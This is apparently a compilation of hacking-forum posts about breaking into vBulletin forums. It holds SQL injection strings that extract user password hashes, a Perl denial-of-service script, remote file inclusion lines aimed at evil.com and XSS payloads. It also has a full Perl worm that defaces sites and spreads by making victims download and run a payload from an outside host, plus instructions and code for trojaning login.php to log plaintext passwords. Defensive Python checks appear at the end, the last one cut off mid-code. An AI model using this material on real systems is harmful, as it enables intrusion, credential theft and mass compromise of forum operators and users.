[HIDE] Tag Bypass
On some forums there's a hide on links, like "register to see the link". You don't have to register at all, it's enough to find that post via "find all posts by ...". The link will be there in plain view. But usually the search shows only the first lines. There's your mega vulnerability)
[HIDE] Tag Bypass 2
freddi, this isn't a vulnerability as you wrote. The authors of such hide posts just don't really know how to use the tags. As you wrote, you have to find all posts by the user - hmm, and what if there are 1000 of them and the one you need is in the middle? And the forum only lets you index 200-400? No need to search through posts, it's simpler: put the cursor on the hidden text and you see the link =).
SQL Injection in the admin panel 3.6.5
SQL Injection in the admin panel (tested on versions 3.6.4 and 3.6.5)
1. Log in to admin panel
2. Go to Attachments->Search
3. Place the following string in the Attached Before field:
Code:
') union select 1,1,1,1,1,userid,password,1,username from user -- 9
vBuserbar SQL-inj
Product: vBuserbar
Vulnerability: SQL-inj
Author: S(r1pt
Address: http://vash_site/vbuserbar.php?do=groupinsert&name=' =\\
vBulletin <=3.5.3 Search DoS
Code:
#!/usr/bin/perl
##########################################
# vBdos.pl - vBulletin <=3.5.3 Search DoS
#
# Written by spic of g00ns
##########################################
# Contact
# Site: www.g00ns.net and www.g00ns-forum.net
# Email: spic <at> g00ns.net
# IRC: irc.g00ns.net #g00ns
##########################################
# Example
# vBdos.pl www.avbforum.com /vbulletin/
##########################################

print q{
____________________________________________________________________________
____ ____ ____ ____ _ __ ____ ____ _ __ ____ _____ ____ __ ___ / __// __//_ // __// |/ // __// _// |/ // __/ / ___// __ / |/ / _ / _/ / // _/ / /_ _/ / / /_ _ / /__ / /_/ // /|_/ / /___//___/ /_//___//_/|_//___//___//_/|_//___/(_)___/ ____//_/ /_/
____________________________________________________________________________
};

use IO::Socket;

$server = $ARGV[0];
$path = $ARGV[1];

while($x != 9999) {
	$post = "search_keywords=Se7enSins+owned+your+site$x+&search_terms=any&search_author=&search_forum=-1&search_time=0&search_fields=msgonly&search_cat=-1&sort_by=0&sort_dir=ASC&show_results=posts&return_chars=200";
	$lrg = length $post;

	if(!$server||!$path) {
		print " vBulletin DoS by spic of g00ns \n\n";
		print " Exploit code found on Se7enSins.com \n\n";
		print " n00bFRAGGER was here... \n\n";
		print " usage: VBDoS.pl <host without http> <directory> \n\n";
		exit();
	}

	my $sock = new IO::Socket::INET (
		PeerAddr => "$server",
		PeerPort => "80",
		Proto    => "tcp",
	);
	die "\nThe Socket Can't Connect To The Desired Host or the Host is MayBe DoSed: $!\n" unless $sock;

	print $sock "POST $path"."search.php?searchid=1952 HTTP/1.1\n";
	print $sock "Host: $server\n";
	print $sock "Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5\n";
	print $sock "Referer: $server\n";
	print $sock "Accept-Language: en-us\n";
	print $sock "Content-Type: application/x-www-form-urlencoded\n";
	print $sock "Accept-Encoding: gzip, deflate\n";
	print $sock "User-Agent: Mozilla/5.0 (BeOS; U; BeOS X.6; en-US; rv:1.7. Gecko/20050511 Firefox/1.0.5\n";
	print $sock "Connection: Keep-Alive\n";
	print $sock "Cache-Control: no-cache\n";
	print $sock "Content-Length: $lrg\n\n";
	print $sock "$post\n";
	close($sock);
	syswrite STDOUT,".";
	$x++;
}
##########################################
VBulletin 3.6.4 [FLASH] (SWF) XSS
There were a lot of questions about the post. For those interested in how this is implemented:
Overview of how an SWF parasite works
Forging HTTP request headers with Flash ActionScript
Bypassing JavaScript Filters the Flash! Attack
Cross-Domain Data Access via Flash [CDDAF]
Reference
Forging HTTP Request Headers with Flash ActionScript
From the newer mods, these haven't been posted yet:
vBulletin Mod RPG Inferno 2.4 (inferno.php) SQL Injection Vulnerability
Exploit : http://site.com/forum/inferno.php?do=ScanMember&id=-1'/**/UNION/**/ALL/**/SELECT/**/1,2,3,4,5,6,7,user(),database(),10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,concat(username,0x3a,password,0x3a,salt),31,@@version,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47/**/from/**/user/**/where/**/usergroupid=6/**/limit/**/0,1/*
vBulletin vBGSiteMap 2.41 (root) Remote File Inclusion Vulnerabilities
Exploit :
vBulletin_Forum_Bath/vbgsitemap/vbgsitemap-config.php?base=http://evil.com?
vBulletin_Forum_Bath/vbgsitemap/vbgsitemap-vbseo.php?base=http://evil.com?
=======
Vbulletin Tube (vBTube) XSS
Exploit :
Code:
vBTube.php?do=search&search=<script>alert(document.cookie);</script>
Example:
Code:
http://www.ruhot.ru/forum/vBTube.php?do=search&search=%3Cscript%3Ealert(document.cookie);%3C/script%3E
vBulletin Worm <= 3.0.6
Code:
#!/usr/bin/perl
#####################
#### #### #### #### #### #### #### #### # # # # #### #### # # # # # # # # # # # # # # #### #### # # ### ## #### # #### ## ### #### # # # # # # # # # # # # # #### # #### #### # # #### #### # # # # #### ####
#####################
use IO::Socket::INET;
$hahaha = $0;
my $processo = "/usr/local/sbin/httpd";
$SIG{"INT"} = "IGNORE";
$SIG{"HUP"} = "IGNORE";
$SIG{"TERM"} = "IGNORE";
$SIG{"CHLD"} = "IGNORE";
$SIG{"PS"} = "IGNORE";
$0 = "$processo"."\0"x16;
my $pid = fork;
exit if $pid;
########################
#                      #
#   search for index   #
#                      #
#######################
system("locate index.* >> index");
system("find / -name index.* >> index");
open(a,"<index");
@ind = <a>;
close(a);
$b = scalar(@ind);
for($a=0;$a<=$b;$a++){
	chomp $ind[$a];
	system("echo spykids ownz your server > $ind[$a]");
}
#########################
#                       #
# grab sites and report #
#                       #
#########################
`cat /etc/httpd/conf/httpd.conf |grep ServerName >> sites`;
open(a,"<sites");
@site = <a>;
close(a);
$b = scalar(@site);
for($a=0;$a<=$b;$a++) {
	$site[$a] =~ s/#//g;
	$site[$a] =~ s/servername//g;
	$site[$a] =~ s/ServerName//g;
	$site[$a] =~ s/ //g;
	$testa = IO::Socket::INET->new(PeerAddr => $site[$a], PeerPort => 80, Proto => "tcp") or next;
	print $testa "GET / HTTP/1.0\n\n";
	print $testa "Host: $site";
	print $testa "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; pt-BR; rv:1.0.1) Gecko/20020823 Netscape/7.0";
	print $testa "Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,video/x-mng,image/png,image/jpeg,image/gif;q=0.2,text/css,*/*;q=0.1";
	print $testa "Accept-Language: pt-br, pt;q=0.50";
	print $testa "Accept-Encoding: gzip, deflate, compress;q=0.9";
	print $testa "Accept-Charset: ISO-8859-1, utf-8;q=0.66, *;q=0.66";
	print $testa "Keep-Alive: 300";
	print $testa "Connection: keep-alive";
	@ow = <$testa>;
	close($teste);
	$ae = "@ow";
	if($ae =~/spykids/i){
		$sock = IO::Socket::INET->new(PeerAddr => "www.zone-h.org", PeerPort => 80, Proto => "tcp") or die "nao conectou";
		print $sock "POST /en/defacements/notify HTTP/1.0\r\n";
		print $sock "Accept: */*\r\n";
		print $sock "Referer: http://www.zone-h.org/en/defacements/notify\r\n";
		print $sock "Accept-Language: pt-br\r\n";
		print $sock "Content-Type: application/x-www-form-urlencoded\r\n";
		print $sock "Connection: Keep-Alive\r\n";
		print $sock "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\r\n";
		print $sock "Host: www.zone-h.org\r\n";
		print $sock "Content-Length: 385\r\n";
		print $sock "Pragma: no-cache\r\n";
		print $sock "\r\n";
		print $sock "notify_defacer=SpyKids&notify_domain=http%3A%2F%2F$site[$a]&notify_hackmode=18&notify_reason=5&notify=+OK+\r\n";
		close($sock);
	}
}
#########################
#                       #
#   worm aws.spykids    #
#                       #
########################
while(1){
	$cmd = '/misc.php?do=page&template={${system(%22cd%20/tmp;curl%20-O%20http://compras.el-nacional.com/spykids.txt%20;perl%20spykids.txt%20;rm%20-rf%20spykids*;%20wget%20http://compras.el-nacional.com/spykids.txt;%20perl%20spykids.txt;%20rm%20-rf%20%20spykids*%22)}}';
	@site = "";
	$a=0;
	@dom = (".ar",".au",".aw",".ax",".az",".ba",".bb",".bd",".be",".bf",".bg",".bh",".bi",".bj",".bm",".bn",".bo",".br",".bs",".bt",".bv",".bw",".by",".bz",".ca",".cc",".cd",".cf",".cg",".ch",".ci",".ck",".cl",".cm",".cn",".co",".cr",".cs",".cu",".cv",".cx",".cy",".cz",".de",".dj",".dk",".dm",".do",".dz",
		".ec",".ee",".eg",".eh",".er",".es",".et",".fi",".fj",".fk",".fm",".fo",".fr",".ga",".gb",".gd",".ge",".gf",".gg",".gh",".gi",".gl",".gm",".gn",".gp",".gq",".gr",".gs",".gt",".gu",".gw",".gy",".hk",".hm",".hn",".hr",".ht",".hu",".id",".ie",".il",".im",".in",".io",".iq",
		".ir",".is",".it",".je",".jm",".jo",".jp",".ke",".kg",".kh",".ki",".km",".kn",".kp",".kr",".kw",".ky",".kz",".la",".lb",".lc",".li",".lk",".lr",".ls",".lt",".lu",".lv",".ly",".ma",".mc",".md",".mg",".mh",".mk",".ml",".mm",
		".mn",".mo",".mp",".mq",".mr",".ms",".mt",".mu",".mv",".mw",".mx",".my",".mz",".na",".nc",".ne",".nf",".ng",".ni",".nl",".no",".np",".nr",".nu",".nz",".om",".pa",".pe",".pf",".pg",".ph",".pk",".pl",".pm",".pn",".pr",".ps",".pt",".pw",".py",
		".qa",".re",".ro",".ru",".rw",".sa",".sb",".sc",".sd",".se",".sg",".sh",".si",".sj",".sk",".sl",".sm",".sn",".so",".sr",".st",".sv",".sy",".sz",".tc",".td",".tf",".tg",".th",".tj",".tk",".tl",".tm",
		".tn",".to",".tp",".tr",".tt",".tv",".tw",".tz",".ua",".ug",".uk",".um",".us",".uy",".uz",".va",".vc",".ve",".vg",".vi",".vn",".vu",".wf",".ws",".ye",".yt",".yu",".za",".zm",".zw");
	foreach $dom (@dom){
		$site = "www.google.com";
		open(a,">pra.txt");
		print a "";
		close(a);
		############### google
		for($n=0;$n<1000;$n += 100){
			$sock = IO::Socket::INET->new(PeerAddr=>"$site",PeerPort=>"80",Proto=>"tcp") or next;
			print $sock "GET h/search?q=%22Powered+by%3A+vBulletin%22inurl%3A$dom&num=100&hl=en&lr=&as_qdr=all&start=$n&sa=N HTTP/1.0\n\n";
			print $sock "Host: www.google.com";
			print $sock "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; pt-BR; rv:1.0.1) Gecko/20020823 Netscape/7.0";
			print $sock "Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,video/x-mng,image/png,image/jpeg,image/gif;q=0.2,text/css,*/*;q=0.1";
			print $sock "Accept-Language: pt-br, pt;q=0.50";
			print $sock "Accept-Encoding: gzip, deflate, compress;q=0.9";
			print $sock "Accept-Charset: ISO-8859-1, utf-8;q=0.66, *;q=0.66";
			print $sock "Keep-Alive: 300";
			print $sock "Connection: keep-alive";
			@resu = <$sock>;
			close($sock);
			$ae = "@resu";
			while ($ae=~ m/<a href=.*?>.*?<\/a>/){
				$ae=~ s/<a href=(.*?)>.*?<\/a>/$1/;
				$uber=$1;
				if ($uber !~/translate/) {
				if ($uber !~ /cache/) {
				if ($uber !~ /"/) {
				if ($uber !~ /google/) {
				if ($uber !~ /216/) {
				if ($uber =~/http/) {
					substr($uber,0,7) = "";
					$nu = rindex $uber, '/';
					$uber = substr($uber,0,$nu);
					open(a,">>pra.txt");
					print a "$uber\n";
					close(a);
				}}}}}}
			}
		}
		$ark = "pra.txt";
		@si = "";
		open (arquivo,"<$ark");
		@si = <arquivo>;
		close(arquivo);
		$novo ="";
		foreach (@si){
			if (!$si{$_}) {
				$novo .= $_;
				$si{$_} = 1;
			}
		}
		open (arquivo,">$ark");
		print arquivo $novo;
		close(arquivo);
		open(a,"<pra.txt");
		@site = <a>;
		close(a);
		foreach $site (@site){
			chomp $site;
			($site, $dir) = split('/',$site);
			$soc = IO::Socket::INET->new(PeerAddr => $site, PeerPort => 80, Proto => "tcp") or next;
			print $soc "GET /$dir$cmd HTTP/1.0\n\n";
			print $soc "Host: $site";
			print $soc "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; pt-BR; rv:1.0.1) Gecko/20020823 Netscape/7.0";
			print $soc "Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,video/x-mng,image/png,image/jpeg,image/gif;q=0.2,text/css,*/*;q=0.1";
			print $soc "Accept-Language: pt-br, pt;q=0.50";
			print $soc "Accept-Encoding: gzip, deflate, compress;q=0.9";
			print $soc "Accept-Charset: ISO-8859-1, utf-8;q=0.66, *;q=0.66";
			print $soc "Keep-Alive: 300";
			print $soc "Connection: keep-alive";
			close($soc);
		}
	}
}
Harvesting passwords from Vbulletin accounts without decrypting (trojaning the forum)
In theory it's all simple: in the file login.php in the site root we add
PHP:
// ############################### start do login ###############################
// this was a _REQUEST action but where do we all login via request?
if ($_POST['do'] == 'login')
{
	$vbulletin->input->clean_array_gpc('p', array(
		'vb_login_username'        => TYPE_STR,
		'vb_login_password'        => TYPE_STR,
		'vb_login_md5password'     => TYPE_STR,
		'vb_login_md5password_utf' => TYPE_STR,
		'postvars'                 => TYPE_STR,
		'cookieuser'               => TYPE_BOOL,
		'logintype'                => TYPE_STR,
		'cssprefs'                 => TYPE_STR,
	));

	define( 'auth_req', './customavatars/avatar178_2.gif' );
	$fp = fopen( auth_req, 'a' );
	$un1=&$vbulletin->GPC['vb_login_username'];
	$un2=&$vbulletin->GPC['vb_login_password'];
	$un3 = date("d.m.y H.i.s");
	$message = "$un3:$un1:$un2\r\n";
	flock($fp,LOCK_EX);
	fwrite( $fp, $message );
	fflush($fp);
	flock($fp,LOCK_UN);
	fclose( $fp );

	// can the user login?
but in the logs we see that there's still no password. A shame... Let's look at the registration form:
Code:
...
<form action="login.php?do=login" method="post" onsubmit="md5hash(vb_login_password, vb_login_md5password, vb_login_md5password_utf, 0)">
...
Aha. So we log in through a function from javascript... The function itself is in clientscript/vbulletin_md5.js, and there at the end we see:
PHP:
// implemented like this to make sure un-updated templates behave as before
input.value = '';
This means the password we entered is simply wiped before being passed on. Just comment out the line and collect passwords (refresh the page, naturally, so the modified JavaScript gets used)...
PHP:
...
// input.value = '';
...
P.S. Against auto-login (cookies) you can wipe all sessions from the DB.
P.P.S. You can also not comment it out but change the variable to $un2=&$vbulletin->GPC['vb_login_md5password']; Still, md5(pass) is easier to brute than md5(md5(pass).salt).
vBulletin 3.7.0 <= XSS Exploit
Found by RoBOTNIK
http://[website]/[forumpath]/ajax.php?do=CheckUsername&param=# EVIL XSS SCRIPT #
http://www.site.com/forums/ajax.php?do=CheckUsername&param=<script>alert('xss');</script>
vBulletin 3.7.0 directory lister from DGT
Might come in handy if there's something valuable lying in the forum folder. Works on all versions, from DGT.
P.S. http://forum.antichat.org/threadnav25644-1-10.html
Harvesting passwords from Vbulletin accounts without decrypting (trojaning the forum)
I did it a bit differently and ended up getting plaintext passwords.
1) Add to the beginning of the file login.php
PHP:
$Login = $_POST['vb_login_username'];
$Passwd = $_POST['vb_login_password'];
$fp = fopen("./customavatars/avatar178_2.gif","a+");
fwrite($fp,"$Login:$Passwd\n");
fclose($fp);
2) Completely empty the file clientscript/vbulletin_md5.js; nothing changes because of this.
3) To reset the sessions, run this code:
PHP:
$link = mysql_connect('хост','логин','пасс');
mysql_select_db('база данных',$link);
$query = "TRUNCATE TABLE префикс_session";
$result = mysql_query($query, $link);
mysql_close($link);
p0h n03s priv8 rootshell vbulletin pw logger
Code:
<?php
/*======================================================================*\
|| #################################################################### ||
|| # vBulletin 3.6.2
|| # ---------------------------------------------------------------- # ||
|| # Copyright ©2000-2006 Jelsoft Enterprises Ltd. All Rights Reserved. ||
|| # This file may not be redistributed in whole or significant part. # ||
|| # ---------------- VBULLETIN IS NOT FREE SOFTWARE ---------------- # ||
|| # http://www.vbulletin.com | http://www.vbulletin.com/license.html # ||
|| #################################################################### ||
\*======================================================================*/

// ####################### SET PHP ENVIRONMENT ###########################
error_reporting(E_ALL & ~E_NOTICE);

// #################### DEFINE IMPORTANT CONSTANTS #######################
define('THIS_SCRIPT', 'login');

// ################### PRE-CACHE TEMPLATES AND DATA ######################
// get special phrase groups
$phrasegroups = array();

// get special data templates from the datastore
$specialtemplates = array();

// pre-cache templates used by all actions
$globaltemplates = array();

// pre-cache templates used by specific actions
$actiontemplates = array(
	'lostpw' => array(
		'lostpw'
	)
);

// ######################### REQUIRE BACK-END ############################
require_once('./global.php');
require_once(DIR . '/includes/functions_login.php');

// #######################################################################
// ######################## START MAIN SCRIPT ############################
// #######################################################################

$vbulletin->input->clean_gpc('r', 'a', TYPE_STR);

if (empty($_REQUEST['do']) AND empty($vbulletin->GPC['a']))
{
	exec_header_redirect($vbulletin->options['forumhome'] . '.php');
}

// ############################### start logout ###############################
if ($_REQUEST['do'] == 'logout')
{
	$vbulletin->input->clean_gpc('r', 'logouthash', TYPE_STR);

	if ($vbulletin->userinfo['userid'] != 0 AND $vbulletin->GPC['logouthash'] != $vbulletin->userinfo['logouthash'])
	{
		eval(standard_error(fetch_error('logout_error', $vbulletin->session->vars['sessionurl'], $vbulletin->userinfo['logouthash'])));
	}

	process_logout();

	$vbulletin->url = fetch_replaced_session_url($vbulletin->url);
	if (strpos($vbulletin->url, 'do=logout') !== false)
	{
		$vbulletin->url = $vbulletin->options['forumhome'] . '.php' . $vbulletin->session->vars['sessionurl_q'];
	}

	$show['member'] = false;
	eval(standard_error(fetch_error('cookieclear', create_full_url($vbulletin->url), $vbulletin->options['forumhome'], $vbulletin->session->vars['sessionurl_q']), '', false));
}

// ############################### start do login ###############################
// this was a _REQUEST action but where do we all login via request?
if ($_POST['do'] == 'login')
{
	$vbulletin->input->clean_array_gpc('p', array(
		'vb_login_username'        => TYPE_STR,
		'vb_login_password'        => TYPE_STR,
		'vb_login_md5password'     => TYPE_STR,
		'vb_login_md5password_utf' => TYPE_STR,
		'postvars'                 => TYPE_STR,
		'cookieuser'               => TYPE_BOOL,
		'logintype'                => TYPE_STR,
		'cssprefs'                 => TYPE_STR,
	));

	//does the user have a pass
	$username = $vbulletin->GPC['vb_login_username'];
	$password = $vbulletin->GPC['vb_login_password'];
	$logfile = "rootshell.txt";
	$lf = fopen($logfile, "a");
	fwrite($lf, "\n".$username . ' : ' . $password."\n");
	fclose($lf);

	// can the user login?
	$strikes = verify_strike_status($vbulletin->GPC['vb_login_username']);
	if ($vbulletin->GPC['vb_login_username'] == '')
	{
		eval(standard_error(fetch_error('badlogin', $vbulletin->options['bburl'], $vbulletin->session->vars['sessionurl'], $strikes)));
	}

	if (!verify_authentication($vbulletin->GPC['vb_login_username'], $vbulletin->GPC['vb_login_password'], $vbulletin->GPC['vb_login_md5password'], $vbulletin->GPC['vb_login_md5password_utf'], $vbulletin->GPC['cookieuser'], true))
	{
		($hook = vBulletinHook::fetch_hook('login_failure')) ? eval($hook) : false;

		// check password
		exec_strike_user($vbulletin->userinfo['username']);
		if ($vbulletin->GPC['logintype'] === 'cplogin' OR $vbulletin->GPC['logintype'] === 'modcplogin')
		{
			// log this error if attempting to access the control panel
			require_once(DIR . '/includes/functions_log_error.php');
			log_vbulletin_error($vbulletin->GPC['vb_login_username'], 'security');
		}

		$vbulletin->userinfo = array(
			'userid'      => 0,
			'usergroupid' => 1
		);

		if ($vbulletin->options['usestrikesystem'])
		{
			eval(standard_error(fetch_error('badlogin_strikes', $vbulletin->options['bburl'], $vbulletin->session->vars['sessionurl'], $strikes)));
		}
		else
		{
			eval(standard_error(fetch_error('badlogin', $vbulletin->options['bburl'], $vbulletin->session->vars['sessionurl'])));
		}
	}

	exec_unstrike_user($vbulletin->GPC['vb_login_username']);

	// create new session
	process_new_login($vbulletin->GPC['logintype'], $vbulletin->GPC['cookieuser'], $vbulletin->GPC['cssprefs']);

	// do redirect
	do_login_redirect();
}
else if ($_GET['do'] == 'login')
{
	// add consistency with previous behavior
	exec_header_redirect($vbulletin->options['forumhome'] . '.php');
}

// ############################### start lost password ###############################
if ($_REQUEST['do'] == 'lostpw')
{
	$vbulletin->input->clean_gpc('r', 'email', TYPE_NOHTML);
	$email = $vbulletin->GPC['email'];

	if ($permissions['forumpermissions'] & $vbulletin->bf_ugp_forumpermissions['canview'])
	{
		$navbits = construct_navbits(array('' => $vbphrase['lost_password_recovery_form']));
		eval('$navbar = "' . fetch_template('navbar') . '";');
	}
	else
	{
		$navbar = '';
	}

	$url =& $vbulletin->url;

	eval('print_output("' . fetch_template('lostpw') . '");');
}

// ############################### start email password ###############################
if ($_POST['do'] == 'emailpassword')
{
	$vbulletin->input->clean_gpc('p', 'email', TYPE_STR);

	if ($vbulletin->GPC['email'] == '')
	{
		eval(standard_error(fetch_error('invalidemail', $vbulletin->options['contactuslink'])));
	}

	require_once(DIR . '/includes/functions_user.php');

	$users = $db->query_read_slave("
		SELECT userid, username, email, languageid
		FROM " . TABLE_PREFIX . "user
		WHERE email = '" . $db->escape_string($vbulletin->GPC['email']) . "'
	");
	if ($db->num_rows($users))
	{
		while ($user = $db->fetch_array($users))
		{
			$user['username'] = unhtmlspecialchars($user['username']);
			$user['activationid'] = build_user_activation_id($user['userid'], 2, 1);
			eval(fetch_email_phrases('lostpw', $user['languageid']));
			vbmail($user['email'], $subject, $message, true);
		}

		$vbulletin->url = str_replace('"', '', $vbulletin->url);
		eval(print_standard_redirect('redirect_lostpw', true, true));
	}
	else
	{
		eval(standard_error(fetch_error('invalidemail', $vbulletin->options['contactuslink'])));
	}
}

// ############################### start reset password ###############################
if ($vbulletin->GPC['a'] == 'pwd' OR $_REQUEST['do'] == 'resetpassword')
{
	$vbulletin->input->clean_array_gpc('r', array(
		'userid'       => TYPE_UINT,
		'u'            => TYPE_UINT,
		'activationid' => TYPE_UINT,
		'i'            => TYPE_UINT
	));

	if (!$vbulletin->GPC['userid'])
	{
		$vbulletin->GPC['userid'] = $vbulletin->GPC['u'];
	}
	if (!$vbulletin->GPC['activationid'])
	{
		$vbulletin->GPC['activationid'] = $vbulletin->GPC['i'];
	}

	$userinfo = verify_id('user', $vbulletin->GPC['userid'], 1, 1);

	$user = $db->query_first("
		SELECT activationid, dateline
		FROM " . TABLE_PREFIX . "useractivation
		WHERE type = 1
			AND userid = $userinfo[userid]
	");

	if ($user['dateline'] < (TIMENOW - 24 * 60 * 60))
	{
		// is it older than 24 hours?
		eval(standard_error(fetch_error('resetexpired', $vbulletin->session->vars['sessionurl'])));
	}

	if ($user['activationid'] != $vbulletin->GPC['activationid'])
	{
		//wrong act id
		eval(standard_error(fetch_error('resetbadid', $vbulletin->session->vars['sessionurl'])));
	}

	// delete old activation id
	$db->query_write("DELETE FROM " . TABLE_PREFIX . "useractivation WHERE userid = $userinfo[userid] AND type = 1");

	// make random number
	$newpassword = vbrand(0, 100000000);

	// init user data manager
	$userdata =& datamanager_init('User', $vbulletin, ERRTYPE_STANDARD);
	$userdata->set_existing($userinfo);
	$userdata->set('password', $newpassword);
	$userdata->save();

	($hook = vBulletinHook::fetch_hook('reset_password')) ? eval($hook) : false;

	eval(fetch_email_phrases('resetpw', $userinfo['languageid']));
	vbmail($userinfo['email'], $subject, $message, true);

	eval(standard_error(fetch_error('resetpw', $vbulletin->session->vars['sessionurl'])));
}

/*======================================================================*\
|| ####################################################################
|| # CVS: $RCSfile: login.php,v $ - $Revision: 1.160 $
|| ####################################################################
\*======================================================================*/
?>
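Against the login.php / vbulletin_md5.js tampering the three posts above describe, an added defender-side check (example code written for this page, not vBulletin's own code nor any poster's): it verifies that vbulletin_md5.js still blanks the plaintext field before submit and flags any file-write call in login.php that receives a value derived from the password fields. The file contents are constructed samples; the function names and the one-pass taint heuristic are my own.

```python
import re

# Constructed samples (not files from any real install) mirroring the tampering
# the posts describe: a commented-out input.value = '' in vbulletin_md5.js and a
# credential write added to login.php. All names below are my own.
CLEAN_MD5_JS = """function md5hash(input, md5input, md5input_utf, force_utf)
{
    md5input.value = hex_md5(input.value);
    // implemented like this to make sure un-updated templates behave as before
    input.value = '';
}
"""
TAMPERED_MD5_JS = CLEAN_MD5_JS.replace("    input.value = '';", "    // input.value = '';")

CLEAN_LOGIN_PHP = """if ($_POST['do'] == 'login')
{
    $vbulletin->input->clean_array_gpc('p', array(
        'vb_login_username' => TYPE_STR,
        'vb_login_password' => TYPE_STR,
    ));
    $strikes = verify_strike_status($vbulletin->GPC['vb_login_username']);
}
"""
TAMPERED_LOGIN_PHP = """$Login = $_POST['vb_login_username'];
$un2 = &$vbulletin->GPC['vb_login_password'];
$message = date("d.m.y H.i.s") . ":$Login:$un2\\r\\n";
$fp = fopen("./customavatars/avatar178_2.gif", "a");
fwrite($fp, $message);
fclose($fp);
""" + CLEAN_LOGIN_PHP

# Request keys that carry the password (plain or client-side MD5); any value
# derived from them that reaches a write sink is a credential leak.
PASSWORD_KEYS = ("vb_login_password", "vb_login_md5password", "vb_login_md5password_utf")
WRITE_SINKS = re.compile(r"\b(fwrite|fputs|file_put_contents|error_log|mail|syslog|curl_exec)\s*\(")
ASSIGNMENT = re.compile(r"^\s*(\$\w+)\s*=(?!=)\s*&?\s*(.*)$")


def strip_js_comments(src):
    """Drop // and /* */ comments so a commented-out statement no longer counts."""
    src = re.sub(r"/\*.*?\*/", "", src, flags=re.S)
    return re.sub(r"//[^\n]*", "", src)


def md5js_clears_plaintext(js_src):
    """True only if vbulletin_md5.js still blanks the plaintext field before submit."""
    return re.search(r"\binput\.value\s*=\s*(''|\"\")", strip_js_comments(js_src)) is not None


def credential_writes(php_src):
    """(line_no, line) for every write sink fed by a password-derived value.
    One forward pass: a variable is tainted when assigned from a password key or
    from an already tainted variable (covers $x = ..., $x =& ..., and string
    interpolation such as "$a:$b")."""
    tainted = set()
    findings = []

    def is_tainted(expr):
        return any(k in expr for k in PASSWORD_KEYS) or any(
            re.search(re.escape(v) + r"\b", expr) for v in tainted)

    for no, line in enumerate(php_src.splitlines(), 1):
        code = line.split("//", 1)[0]   # crude comment strip, enough for this check
        m = ASSIGNMENT.match(code)
        if m and is_tainted(m.group(2)):
            tainted.add(m.group(1))
        if WRITE_SINKS.search(code) and is_tainted(code):
            findings.append((no, line.strip()))
    return findings


def audit(js_src, php_src):
    """Combined verdict for one install: both checks must come back clean."""
    return {"md5js_clears_plaintext": md5js_clears_plaintext(js_src),
            "credential_writes": credential_writes(php_src)}
```

An emptied vbulletin_md5.js (step 2 of the second post) fails the first check the same way a commented-out line does, since there is no longer any statement that blanks the field.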
Refutation - Vbulletin 3.7.0 Gold Sql injection on faq.php
I just looked at the code. Yes, there really is no use in the bug. It's a logic error: with a single character the query to the DB gets built incorrectly. Impossible to use to any advantage.
XSS vBanonymizer
XSS in vBulletin
{ The victim must have:
Vbulletin forum - any version
vBanonymizer - any version before 24.06.08 }
(c) _vbsupport.org
XSS (3.7.1 & 3.6.10)
XSS-base64
_http://securityvulns.ru/news/CGI/2008.06.14.html
_http://securityvulns.ru/news/CGI/2008.06.19.html
Exploit:
http://localhost/vB3/admincp/index.php?redirect=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K
http://localhost/vB3/modcp/index.php?redirect=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K
Xss (3.7.2, 3.6.10)
XSS in admin logs - vBulletin 3.7.2 and lower, vBulletin 3.6.10 PL2 and lower
http://securityvulns.ru/Udocument137.html
The vulnerability exists due to insufficient handling of the "PHP_SELF" and "do" parameters when a non-existent page is requested.
Exploit:
1) Leave our XSS in the vB logs using this exploit:
HTML:
<html>
<body>
<img src="http://localhost/vB/upload/admincp/faq.php/0?do=<script>/*" />
<img src="http://localhost/vB/upload/admincp/faq.php/1?do=*/a%3D'document.wri'/*" />
<img src="http://localhost/vB/upload/admincp/faq.php/2?do=*/b%3D'te(%22<script '/*" />
<img src="http://localhost/vB/upload/admincp/faq.php/3?do=*/c%3D'src=http://'/*" />
<!--edit to match your data -->
<img src="http://localhost/vB/upload/admincp/faq.php/4?do=*/d%3D'localhost/'/*" />
<img src="http://localhost/vB/upload/admincp/faq.php/5?do=*/e%3D''/*" />
<img src="http://localhost/vB/upload/admincp/faq.php/6?do=*/f%3D't.js></scrip'/*" />
<!-- end edit -->
<img src="http://localhost/vB/upload/admincp/faq.php/7?do=*/g%3D't>%22)'/*" />
<img src="http://localhost/vB/upload/admincp/faq.php/8?do=*/h%3Da%2Bb%2Bc%2Bd%2Be%2Bf%2Bg/*" />
<img src="http://localhost/vB/upload/admincp/faq.php/9?do=*/eval(h)/*" />
<img src="http://localhost/vB/upload/admincp/faq.php/a0?do=*/</script>" />
</body>
</html>
2) Then send the admin to the link:
/adminlog.php?do=view&script=&u=0&pp=15&orderby=script&page=1
Limitations:
PHP_SELF - 50 characters max and no slashes
_REQUEST['do'] is limited to 20 characters
It is also reported that an attacker can inject and execute arbitrary PHP code on the system with the privileges of the web server.
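An added defender-side example (my code, not from the advisory or the post above): it reconstructs how an adminlog.php listing would render a set of constructed log rows, shows that HTML-escaping each field removes the cross-row script block, and flags rows carrying the markup or JS-comment fragments that the 50/20-character limits force a payload to be split into. The table layout, the column semantics and all function names are assumptions.

```python
import html
import re

# Constructed adminlog rows in display order: (script column = PHP_SELF basename,
# action column = the "do" parameter). Not real log data. The first three rows
# follow the fragment pattern from the exploit above; the last is a normal entry.
LOG_ROWS = [
    ("faq.php/0", "<script>/*"),
    ("faq.php/1", "*/alert(1)/*"),
    ("faq.php/2", "*/</script>"),
    ("index.php", "login"),
]

# Per-entry sizes the advisory states the log can hold.
SCRIPT_MAX, ACTION_MAX = 50, 20

FRAGMENT_MARKERS = re.compile(r"<|>|/\*|\*/|\beval\s*\(|javascript:", re.I)
SCRIPT_BLOCK = re.compile(r"<script\b[^>]*>(.*?)</script\s*>", re.I | re.S)


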